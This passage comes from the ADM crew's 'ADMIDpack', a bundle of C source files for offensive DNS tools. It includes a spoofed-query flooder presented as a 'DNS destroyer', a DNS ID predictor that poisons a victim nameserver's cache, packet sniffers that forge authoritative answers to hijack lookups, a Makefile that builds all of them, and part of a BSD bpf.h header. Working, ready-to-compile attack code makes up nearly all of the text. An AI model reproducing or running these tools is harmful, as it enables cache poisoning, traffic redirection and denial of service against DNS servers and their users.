#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"
void main(int argc, char **argv)
{
struct dnshdr *dns;
char *data;
char buffer2[4000];
unsigned char namez[255];
unsigned long s_ip;
unsigned long d_ip;
int sraw,on=1;
if(argc <2){printf(" usage : %s <host> \n",argv[0]); exit(0);}
dns = (struct dnshdr *)buffer2;
data = (char *)(buffer2+12);
bzero(buffer2,sizeof(buffer2));
if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
}
if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
}
printf("ADMdnsFuker %s DNS DESTROYER made by the ADM crew\n",VERSION);
printf("(c) ADM,Heike vouais tous se ki est as moi est a elle aussi ...\n");
sleep(1);
s_ip=host2ip("100.1.2.3");
d_ip=host2ip(argv[1]);
dns->id = 123;
dns->rd = 1;
dns->que_num = htons(1);
while(1){
sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());
printf("%s\n",namez);
strcpy(data,namez);
*( (u_short *) (data+strlen(namez)+1) ) = ntohs(12);
*( (u_short *) (data+strlen(namez)+3) ) = ntohs(1);
udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
s_ip=ntohl(s_ip);
s_ip++;
s_ip=htonl(s_ip);
}
}
<-->
<++> ADMIDpack/ADMkillDNS.c
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"
#define ERROR -1
#define VERSION "0.3 pub"
#define ID_START 1
#define ID_STOP 65535
#define PORT_START 53
#define PORT_STOP 54
void main(int argc, char **argv)
{
struct dnshdr *dns;
char *data;
char buffer2[4000];
unsigned char namez[255];
unsigned long s_ip,s_ip2;
unsigned long d_ip,d_ip2;
int sraw, i, on=1, x, loop, idstart, idstop, portstart, portstop;
if(argc <5){
system("/usr/bin/clear");
printf(" usage : %s <ip src> <ip dst> <name> <ip>\n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n",argv[0]);
printf(" ip src: ip source of the dns anwser\n");
printf(" ip dst: ip of the dns victim\n");
printf(" name : spoof name ex: www.dede.com\n");
printf(" ip : the ip associate with the name\n");
printf(" options \n");
printf(" [A,B,N] \n");
printf(" A: flood the DNS victim with multiple query\n");
printf(" B: DOS attack for destroy the DNS \n");
printf(" N: None attack \n\n");
printf(" [ID_START] \n");
printf(" ID_START: id start :> \n\n");
printf(" [ID_STOP] n");
printf(" ID_STOP : id stop :> \n\n");
printf(" PORT START,PORT STOP: send the spoof to the portstart at portstop\n\n");
printf("\033[01mADMkillDNS %s (c) ADM\033[0m , Heike \n",VERSION);
exit(ERROR);
}
dns = (struct dnshdr *)buffer2;
data = (char *)(buffer2+DNSHDRSIZE);
bzero(buffer2,sizeof(buffer2));
if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
}
if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
}
printf("ADMkillDNS %s",VERSION);
printf("\nouais ben mwa je dedie ca a ma Heike");
printf("\nREADY FOR ACTION!\n");
s_ip2=s_ip=host2ip(argv[1]);
d_ip2=d_ip=host2ip(argv[2]);
if(argc>5)if(*argv[5]=='A')
{
for(loop=0;loop<10;loop++){
dns->id = 6000+loop;
dns->qr = 0;
dns->rd = 1;
dns->aa = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);
i=makepaketQS(data,argv[3],TYPE_A);
udp_send(sraw,s_ip,d_ip,1200+loop,53,buffer2,DNSHDRSIZE+i);
s_ip=ntohl(s_ip);
s_ip++;
s_ip=htonl(s_ip);
}
} /* end of DNS flood query */
/* ici on trouve la routine contre un DOS */
if(argc>5)if(*argv[5]=='B')
{
s_ip=host2ip("100.1.2.3");
dns->id = 123;
dns->rd = 1;
dns->que_num = htons(1);
printf("plz enter the number of packet u wanna send\n");
scanf("%i",&i);
for(x=0;x<i;x++){
sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());
strcpy(data,namez);
*( (u_short *) (data+strlen(namez)+1) ) = ntohs(12);
*( (u_short *) (data+strlen(namez)+3) ) = ntohs(1);
udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
s_ip=ntohl(s_ip);
s_ip++;
s_ip=htonl(s_ip);
printf("send packet num %i:%i\n",x,i);
}
} /* end of DNS DOS */
if(argc > 6 )idstart = atoi(argv[6]);
else
idstart = ID_START;
if(argc > 7 )idstop = atoi(argv[7]);
else
idstop = ID_STOP;
if(argc > 8 ){
portstart = atoi(argv[8]);
portstop = atoi(argv[9]);
}
else {
portstart = PORT_START;
portstop = PORT_STOP;
}
bzero(buffer2,sizeof(buffer2));
bzero(namez,sizeof(namez));
i=0;
x=0;
s_ip=s_ip2;
d_ip=d_ip2;
for(;idstart<idstop;idstart++){
dns->id = htons(idstart);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->que_num = htons(1);
dns->rep_num = htons(1);
printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop);
i=makepaketAW(data,argv[3],argv[4],TYPE_A);
for(;x < portstop; x++)
udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i);
x = portstart;
}
printf(" terminated..\n");
}
<-->
<++> ADMIDpack/ADMnOg00d.c
/***************************/
/* ADMnog00d (c) ADM */
/***************************/
/* ADM DNS ID PREDICTOR */
/***************************/
#include <fcntl.h>
#include <unistd.h>
#include "dns.h"
#include "ADM-spoof.c"
#include "ADMDNS2.c"
#define VERSION "0.7 pub"
#define SPOOFIP "4.4.4.4"
#define ERROR -1
#define LEN sizeof(struct sockaddr)
#define UNDASPOOF "111.111.111.111"
#define TIMEOUT 300
#define DNSHDRSIZE 12
void usage()
{
printf(" ADMnoG00D <your ip> <dns trust> <domaine trust> <ip victim> <TYPE> <spoof name> <spoof ip> <ns.trust.for.the.spoof> [ID] \n");
printf("\n ex: ADMnoG00d ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n");
printf(" well... we going to poison ns.victime.com for they resolv mouhhahaha.hol.fr in 31.3.3.7\n");
printf(" we use provnet.fr and ns1.provnet for find ID of ns.victim.com\n");
printf(" we use ns.isdnet.net for spoof because they have auth on *.hol.fr\n");
printf(" for more information..\n");
printf(" check ftp.janova.org/pub/ADM/ \n");
printf(" mail ADM@janova.org \n");
printf(" ask Heike from me...:) \n");
exit(-1);
}
void senddnspkt(s,d_ip,wwwname,ip,dns)
int s;
u_long d_ip;
char *wwwname;
char *ip;
struct dnshdr *dns;
{
struct sockaddr_in sin;
int i;
char buffer[1024];
char *data = (char *)(buffer+DNSHDRSIZE);
bzero(buffer,sizeof(buffer));
memcpy(buffer,dns,DNSHDRSIZE);
if(dns->qr == 0)
{
i=makepaketQS(data,wwwname,TYPE_A);
sin.sin_family = AF_INET;
sin.sin_port = htons(53);
sin.sin_addr.s_addr = d_ip;
sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
}
else
{
i=makepaketAW(data,wwwname,ip,TYPE_A);
sin.sin_family = AF_INET;
sin.sin_port = htons(53);
sin.sin_addr.s_addr = d_ip;
sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
}
}
void dns_qs_no_rd(s,d_ip,wwwname,ID)
int s;
u_long d_ip;
char *wwwname;
int ID;
{
struct dnshdr *dns;
char *data;
char buffer[1024];
int i;
dns = (struct dnshdr *)buffer;
data = (char *)(buffer+DNSHDRSIZE);
bzero(buffer,sizeof(buffer));
dns->id = htons(ID);
dns->qr = 0;
dns->rd = 0; /* dont want the recusion !! */
dns->aa = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);
i=makepaketQS(data,wwwname,TYPE_A);
senddnspkt(s,d_ip,wwwname,NULL,dns);
}
void main(int argc, char **argv)
{
struct sockaddr_in sin_rcp;
struct dnshdr *dns, *dns_recv;
char *data, *data2;
char buffer2[4000];
char buffer[4000];
char spoofname[255];
char spoofip[255];
char dnstrust[255];
char bla[255];
char *alacon;
unsigned char fakename[255];
unsigned char namez[255];
unsigned long s_ip, s_ip2;
unsigned long d_ip, d_ip2, trust;
unsigned int DA_ID = 65535, loop = 65535;
int sraw, s_r, i, on=1, x, ID,timez;
int len = sizeof(struct sockaddr);
dns_recv = (struct dnshdr *)(buffer);
data2 = (char *)(buffer+DNSHDRSIZE);
dns = (struct dnshdr *)buffer2;
data = (char *)(buffer2+DNSHDRSIZE);
bzero(buffer2,sizeof(buffer2));
srand(time(NULL));
if( (s_r=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) == ERROR ){
perror("socket");
exit(ERROR);
}
if( (fcntl(s_r,F_SETFL,O_NONBLOCK)) == ERROR ){
perror("fcntl");
exit(ERROR);
}
if ((sraw = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR ){
perror("socket");
exit(ERROR);
}
if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)){
perror("setsockopt");
exit(ERROR);
}
if(argc < 2) usage();
if(argc > 9 )DA_ID = loop = atoi(argv[9]);
if(argc > 6)strcpy(spoofname,argv[6]);
else{
printf("enter the name you wanna spoof:");
scanf("%s",spoofname);
}
if(argc > 7)strcpy(bla,argv[7]);
else{
printf("enter the ip's of the spoof name:");
scanf("%s",bla);
}
alacon =(char *)inet_ntoa(host2ip(bla));
strcpy(spoofip,alacon);
if( argc > 8 ) strcpy(bla,argv[8]);
else{
printf("enter the DNS trust of the victim:");
scanf("%s",bla);
}
alacon =(char *)inet_ntoa(host2ip(bla));
strcpy(dnstrust,alacon);
printf("ADMnoG00d %s\n",VERSION);
printf("\033[1mHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n");
sleep(1);
printf("\nLets Play =)!!\n");
/* save some param */
s_ip2 = host2ip(argv[1]);
d_ip2 = d_ip = host2ip(argv[4]);
trust = host2ip(argv[2]);
s_ip = host2ip(UNDASPOOF);
while(1){
sprintf(fakename,"%i%i%i%i%i%i.%s",
myrand(),
myrand(),
myrand(),
myrand(),
myrand(),
myrand(),
argv[3]);
sendquestion(s_ip,d_ip,fakename,TYPE_A);
/* end of question packet */
bzero(buffer2,sizeof(buffer2)); /* RE init some variable */
bzero(namez,sizeof(namez));
i=0;
x=0;
/* here start the spoof anwser */
ID = loop;
for(;loop >= ID-10 ;loop--){
dns->id = htons(loop);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->que_num = htons(1);
dns->rep_num = htons(1);
i=makepaketAW(data,fakename,SPOOFIP,TYPE_A);
udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+i);
}
bzero(buffer2,sizeof(buffer2)); /* RE init some variable */
bzero(namez,sizeof(namez));
i=0;
x=0;
/* time for test spoof */
dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); /* here we sending question */
/* non recursive ! */
/* we waiting for awnser ... */
while(1){
for(timez=0;timez < TIMEOUT; timez++){
if( recvfrom(s_r,buffer,sizeof(buffer),0,(struct sockaddr *)&sin_rcp,&len) != -1 )
{
printf("ok whe have the reponse ;)\n");
timez = 0;
break;
}
usleep(10);
timez++;
}
if(timez != 0){
printf("hum no reponse from the NS ressend question..\n");
dns_qs_no_rd(s_r,d_ip2,fakename,myrand());
}
else break;
}
/* ok we have a awnser */
printf("fakename = %s\n",fakename);
if(sin_rcp.sin_addr.s_addr == d_ip2 )
if(sin_rcp.sin_port == htons(53) )
{
if( dns_recv->qr == 1 )
if( dns_recv->rep_num == 0 ) /* hum we dont have found the right ID */
printf("try %i < ID < %i \n",ID-10,ID);
else{
/* Hoho we have the spoof has worked we have found the right ID ! */
printf("the DNS ID of %s iz %i< ID <%i !!\n",argv[4],loop-10,loop);
printf("let's send the spoof...\n");
dnsspoof(dnstrust,argv[4],spoofname,spoofip,loop,atoi(argv[5]));
printf("spoof sended ...\n");
exit(0);
}
} /* end of if (sin_rcp.sin_port == htons(53) ) */
bzero(buffer,sizeof(buffer));
} /* end of while loop */
}/* end of proggies */
<-->
<++> ADMIDpack/ADMsnOOfID.c
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"
#include <pcap.h>
#include <net/if.h>
#define DNSHDRSIZE 12
#define SPOOF "127.0.0.1"
#define VERSION "ver 0.6 pub"
#define ERROR -1
int ETHHDRSIZE;
void main(argc, argv)
int argc;
char *argv[];
{
struct pcap_pkthdr h;
struct pcap *pcap_d;
struct iphdr *ip;
struct udphdr *udp;
struct dnshdr *dnsrecv,*dnssend;
char *data;
char *data2;
char *buffer;
char namefake[255];
char buffer2[1024];
char ebuf[255];
char spoofname[255];
char spoofip[255];
char bla[255];
char dnstrust[255];
char *alacon;
unsigned long s_ipns;
unsigned long d_ip;
int sraw, i, on=1, con, ID,DA_ID,type;
srand( (time(NULL) % random() * random()) );
if(argc <2){
printf("usage : %s <device> <ns.victim.com> <your domain> <IP of ur NS> <type 1,12> <spoofname> <spoof ip> <ns trust> \n",argv[0]);
printf("ex: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr \n",argv[0]);
printf(" So ... we tryed to poison victim.com with type 12 (PTR) .. now if som1 asked for the ip of mail.provnet.fr they have resoled to damn.diz.ip.iz.ereet.ya\n");
exit(0);
}
if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0;
else ETHHDRSIZE = 14;
if(argc>5)type=atoi(argv[5]);
if(argc > 6)strcpy(spoofname,argv[6]);
else{
printf("enter the name you wanna spoof:");
scanf("%s",spoofname);
}
if(argc > 7)strcpy(bla,argv[7]);
else{
printf("enter the ip's of the spoof name:");
scanf("%s",bla);
}
alacon =(char *)inet_ntoa(host2ip(bla));
strcpy(spoofip,alacon);
if(argc > 8)strcpy(bla,argv[8]);
else{
printf("enter the dns trust for the spoof\n");
scanf("%s",bla);
}
alacon =(char *)inet_ntoa(host2ip(bla));
strcpy(dnstrust,alacon);
dnssend = (struct dnshdr *)buffer2;
data2 = (char *)(buffer2+DNSHDRSIZE);
bzero(buffer2,sizeof(buffer2));
if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
}
if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
}
printf("ADMsn0ofID.c %s ADM ID sniffer\n",VERSION);
printf("ADMsnO0fID (\033[5m\033[01mc\033[0m) ADM,Heike\n");
sleep(1);
pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf);
s_ipns = host2ip(argv[4]);
d_ip = host2ip(argv[2]);
con = myrand();
/* make the question for get the ID */
sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]);
dnssend->id = 2600;
dnssend->qr = 0;
dnssend->rd = 1;
dnssend->aa = 0;
dnssend->que_num = htons(1);
dnssend->rep_num = htons(0);
i = makepaketQS(data2,namefake,TYPE_A);
udp_send(sraw, s_ipns, d_ip,2600+con, 53, buffer2, DNSHDRSIZE+i);
printf("Question sended...\n");
printf("Its Time to w8 \n");
while(1)
{
buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */
ip = (struct iphdr *)(buffer+ETHHDRSIZE);
udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE);
dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);
if(ip->protocol == IPPROTO_UDP){
printf("[%s:%i ->",inet_ntoa(ip->saddr),ntohs(udp->source));
printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest));
}
if(ip->protocol == 17 )
if(ip->saddr.s_addr == d_ip )
if(ip->daddr.s_addr == s_ipns )
if(udp->dest == htons(53) )
if(dnsrecv->qr == 0 )
{
printf("kewl :)~ we have the packet !\n");
ID = dnsrecv->id ; /* we get the id */
printf("the current id of %s is %d \n",argv[2],ntohs(ID));
DA_ID = ntohs(ID);
printf("send the spoof...\n");
dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type);
printf("spoof sended...\n");
exit(0);
}
}
/* well now we have the ID we cant predict the ID */
}
<-->
<++> ADMIDpack/ADMsniffID.c
#include <pcap.h>
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"
#define ERROR -1
#define DNSHDRSIZE 12
#define VERSION "ver 0.4 pub"
int ETHHDRSIZE;
void usage(){
printf("usage : ADMsniffID <device> <IP> <name> <type of spoof[1,12]> \n");
printf("ex: ADMsniffID eth0 \"127.0.0.1\" \"www.its.me.com\" \n");
exit(ERROR);
}
void main(int argc, char **argv)
{
struct pcap_pkthdr h;
struct pcap *pcap_d;
struct iphdr *ip;
struct udphdr *udp;
struct dnshdr *dnsrecv,*dnssend;
char *data;
char *data2;
char *buffer;
char SPOOFIP[255];
char bla[255];
char spoofname[255];
char tmp2[255];
char ebuf[255];
char buffer2[1024];
unsigned char namez[255];
int sraw,on=1,tmp1,type;
if(argc <2)usage();
if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0;
else ETHHDRSIZE = 14;
strcpy(SPOOFIP,argv[2]);
strcpy(spoofname,argv[3]);
type = atoi(argv[4]);
/* Buffer 'n' tcp/ip stuff */
dnssend = (struct dnshdr *)buffer2;
data2 = (char *)(buffer2+12);
/* bzero(buffer,sizeof(buffer)); */
bzero(bla,sizeof(bla));
bzero(buffer2,sizeof(buffer2));
if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
}
if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
}
/* open pcap descriptor */
pcap_d = pcap_open_live(argv[1],sizeof(buffer),0,100,ebuf);
printf("ADMsniffID %s (c) ADMnHeike\n",VERSION);
while(1){
buffer =(u_char *)pcap_next(pcap_d,&h); /* catch the packet */
ip = (struct iphdr *)(buffer+ETHHDRSIZE);
udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE);
dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);
if(ip->protocol == 17)
if(udp->dest == htons(53) )
if(dnsrecv->qr == 0)
{
strcpy(namez,data);
nameformat(namez,bla);
printf("hum we have a DNS question from %s diz guyz wanna %s!\n",inet_ntoa(ip->saddr),(char *)bla);
bzero(bla,sizeof(bla));
printf("the question have the type %i and type of the query %i\n"
,ntohs(*((u_short *)(data+strlen(data)+1)))
,ntohs(*((u_short *)(data+strlen(data)+2+1))));
/* well in diz version we only spoof the type 'A' */
/* check out for a new version in ftp.janova.org/pub/ADM */
printf("make the spoof packet...\n");
printf("dns header\n");
/* here we gonna start to make the spoofed paket :)*/
memcpy(dnssend,dnsrecv,DNSHDRSIZE+strlen(namez)+5);
dnssend->id=dnsrecv->id; /* haha the ID ;) */
dnssend->aa=1; /* i've the authority */
dnssend->ra=1; /* i've the recusion */
dnssend->qr=1; /* its a awser */
dnssend->rep_num = htons(1); /* i've one awnser */
printf("ID=%i\nnumba of question=%i\nnumba of awnser =%i\n"
,dnssend->id,ntohs(dnssend->que_num),ntohs(dnssend->rep_num));
printf("Question..\n");
printf("domainename=%s\n",data2);
printf("type of question=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1))));
printf("type of query=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1+2))));
if( type == TYPE_PTR){
tmp1=strlen(namez)+5;
strcpy(data2+tmp1,namez);
tmp1=tmp1+strlen(namez)+1;
bzero(tmp2,sizeof(tmp2));
nameformat(spoofname,tmp2);
printf("tmp2 = %s\n",tmp2);
printf(" mouhahahah \n");
*((u_short *)(data2+tmp1)) = htons(TYPE_PTR);
*((u_short *)(data2+tmp1+2)) = htons(1);
*((u_long *)(data2+tmp1+2+2)) = htonl(86400);
*((u_short *)(data2+tmp1+2+2+4)) = htons(strlen((tmp2)+1));
printf("bhaa?.\n");
strcpy((data2+tmp1+2+2+4+2),tmp2);
printf(" ouf !! =) \n");
tmp1 = tmp1 +strlen(tmp2)+ 1;
}
if( type == TYPE_A){
tmp1=strlen(namez)+5;
strcpy(data2+tmp1,namez);
tmp1=tmp1+strlen(namez)+1;
*((u_short *)(data2+tmp1)) = htons(TYPE_A);
*((u_short *)(data2+tmp1+2)) = htons(1);
*((u_long *)(data2+tmp1+2+2)) = htonl(86400);
*((u_short *)(data2+tmp1+2+2+4)) = htons(4);
*((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(SPOOFI
P);
}
printf("Answer..\n");
printf("domainname=%s\n",tmp2);
printf("type=%i\n",ntohs(*((u_short *)(data2+tmp1))));
printf("classe=%i\n",ntohs(*((u_short *)(data2+tmp1+2))));
printf("time to live=%u\n",ntohl(*((u_long *)(data2+tmp1+2+2))));
printf("resource data lenght=%i\n",ntohs(*((u_short *)(data2+tmp1+2+2+4))));
printf("IP=%s\n",inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2))));
tmp1=tmp1+2+2+4+2+4; /* now tmp1 == the total length of packet dns */
/* without the dnshdr */
udp_send(sraw
,ip->daddr
,ip->saddr
,ntohs(udp->dest)
,ntohs(udp->source)
,buffer2
,DNSHDRSIZE+tmp1);
} /* end of the spoof */
} /* end of while(1) */
} /* The End !! ;) */
<-->
<++> ADMIDpack/Makefile
# version 0.1
#/usr/contrib/bin/gcc -L. -I. ADMkillDNS.c -lsocket -lnsl -lpcap -o ../ADMbin/ADMkillDNS
SHELL = /bin/sh
# uncomment this if your are not on LinuX
#LIBS = -lsocket -lnsl -lpcap
#
CC = gcc
LIBS = -lpcap
BIN = .
CFLAGS = -I. -L.
all: ADMkillDNS ADMsnOOfID ADMsniffID ADMdnsfuckr ADMnOg00d
ADMkillDNS: ADMkillDNS.c
$(CC) $(CFLAGS) ADMkillDNS.c $(LIBS) -o $(BIN)/ADMkillDNS
ADMsnOOfID: ADMsnOOfID.c
$(CC) $(CFLAGS) ADMsnOOfID.c $(LIBS) -o $(BIN)/ADMsnOOfID
ADMsniffID: ADMsniffID.c
$(CC) $(CFLAGS) ADMsniffID.c $(LIBS) -o $(BIN)/ADMsniffID
ADMdnsfuckr: ADMdnsfuckr.c
$(CC) $(CFLAGS) ADMdnsfuckr.c $(LIBS) -o $(BIN)/ADMdnsfuckr
ADMnOg00d: ADMnOg00d.c
$(CC) $(CFLAGS) ADMnOg00d.c $(LIBS) -o $(BIN)/ADMnOg00d
clean:
rm -f $(BIN)/*o $(BIN)/ADMsniffID $(BIN)/ADMsnOOfID $(BIN)/ADMnOg00d \
$(BIN)/ADMkillDNS $(BIN)/ADMdnsfuckr
<-->
<++> ADMIDpack/bpf.h
/*-
* Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997
* The Regents of the University of California. All rights reserved.
*
* This code is derived from the Stanford/CMU enet packet filter,
* (net/enet.c) distributed as part of 4.3BSD, and code contributed
* to Berkeley by Steven McCanne and Van Jacobson both of Lawrence
* Berkeley Laboratory.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the University of
* California, Berkeley and its contributors.
* 4. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* @(#)bpf.h 7.1 (Berkeley) 5/7/91
*
* @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL)
*/
#ifndef BPF_MAJOR_VERSION
/* BSD style release date */
#define BPF_RELEASE 199606
typedef int bpf_int32;
typedef u_int bpf_u_int32;
/*
* Alignment macros. BPF_WORDALIGN rounds up to the next
* even multiple of BPF_ALIGNMENT.
*/
#define BPF_ALIGNMENT sizeof(bpf_int32)
#define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1))
#define BPF_MAXINSNS 512
#define BPF_MAXBUFSIZE 0x8000
#define BPF_MINBUFSIZE 32
/*
* Structure for BIOCSETF.
*/
struct bpf_program {
u_int bf_len;
struct bpf_insn *bf_insns;
};
/*
* Struct returned by BIOCGSTATS.
*/
struct bpf_stat {
u_int bs_recv; /* number of packets received */
u_int bs_drop; /* number of packets dropped */
};
/*
* Struct return by BIOCVERSION. This represents the version number of
* the filter language described by the instruction encodings below.
* bpf understands a program iff kernel_major == filter_major &&
* kernel_minor >= filter_minor, that is, if the value returned by the
* running kernel has the same major number and a minor number equal
* equal to or less than the filter being downloaded. Otherwise, the
* results are undefined, meaning an error may be returned or packets
* may be accepted haphazardly.
* It has nothing to do with the source code version.
*/
struct bpf_version {
u_short bv_major;
u_short bv_minor;
};
/* Current version number of filter architecture. */
#define BPF_MAJOR_VERSION 1
#define BPF_MINOR_VERSION 1
/*
* BPF ioctls
*
* The first set is for compatibility with Sun's pcc style
* header files. If your using gcc, we assume that you
* have run fixincludes so the latter set should work.
*/
#if (defined(sun) || defined(ibm032)) && !defined(__GNUC__)
#define BIOCGBLEN _IOR(B,102, u_int)
#define BIOCSBLEN _IOWR(B,102, u_int)
#define BIOCSETF _IOW(B,103, struct bpf_program)
#define BIOCFLUSH _IO(B,104)
#define BIOCPROMISC _IO(B,105)
#define BIOCGDLT _IOR(B,106, u_int)
#define BIOCGETIF _IOR(B,107, struct ifreq)
#define BIOCSETIF _IOW(B,108, struct ifreq)
#define BIOCSRTIMEOUT _IOW(B,109, struct timeval)
#define BIOCGRTIMEOUT _IOR(B,110, struct timeval)
#define BIOCGSTATS _IOR(B,111, struct bpf_stat)
#define BIOCIMMEDIATE _IOW(B,112, u_int)
#define BIOCVERSION _IOR(B,113, struct bpf_version)
#define BIOCSTCPF _IOW(B,114, struct bpf_program)
#define BIOCSUDPF _IOW(B,115, struct bpf_program)
#else
#define BIOCGBLEN _IOR('B',102, u_int)
#define BIOCSBLEN _IOWR('B',102, u_int)
#define BIOCSETF _IOW('B',103, struct bpf_program)
#define BIOCFLUSH _IO('B',104)
#define BIOCPROMISC _IO('B',105)
#define BIOCGDLT _IOR('B',106, u_int)
#define BIOCGETIF _IOR('B',107, struct ifreq)
#define BIOCSETIF _IOW('B',108, struct ifreq)
#define BIOCSRTIMEOUT _IOW('B',109, struct timeval)
#define BIOCGRTIMEOUT _IOR('B',110, struct timeval)
#define BIOCGSTATS _IOR('B',111, struct bpf_stat)
#define BIOCIMMEDIATE _IOW('B',112, u_int)
#define BIOCVERSION _IOR('B',113, struct bpf_version)
#define BIOCSTCPF _IOW('B',114, struct bpf_program)
#define BIOCSUDPF _IOW('B',115, struct bpf_program)
#endif
/*
* Structure prepended to each packet.
*/
struct bpf_hdr {
struct timeval bh_tstamp; /* time stamp */
bpf_u_int32 bh_caplen; /* length of captured portion */
bpf_u_int32 bh_datalen; /* original length of packet */
u_short bh_hdrlen; /* length of bpf header (this struct
plus alignment padding) */
};
/*
* Because the structure above is not a multiple of 4 bytes, some compilers
* will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work.
* Only the kernel needs to know about it; applications use bh_hdrlen.
*/
#ifdef KERNEL
#define SIZEOF_BPF_HDR 18
#endif
/*
* Data-link level type codes.
*/
#define DLT_NULL 0 /* no link-layer encapsulation */
#define DLT_EN10MB 1 /* Ethernet (10Mb) */
#define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */
#define DLT_AX25 3 /* Amateur Radio AX.25 */
#define DLT_PRONET 4 /* Proteon ProNET Token Ring */
#define DLT_CHAOS 5 /* Chaos */
#define DLT_IEEE802 6 /* IEEE 802 Networks */
#define DLT_ARCNET 7 /* ARCNET */
#define DLT_SLIP 8 /* Serial Line IP */
#define DLT_PPP 9 /* Point-to-point Protocol */
#define DLT_FDDI 10 /* FDDI */
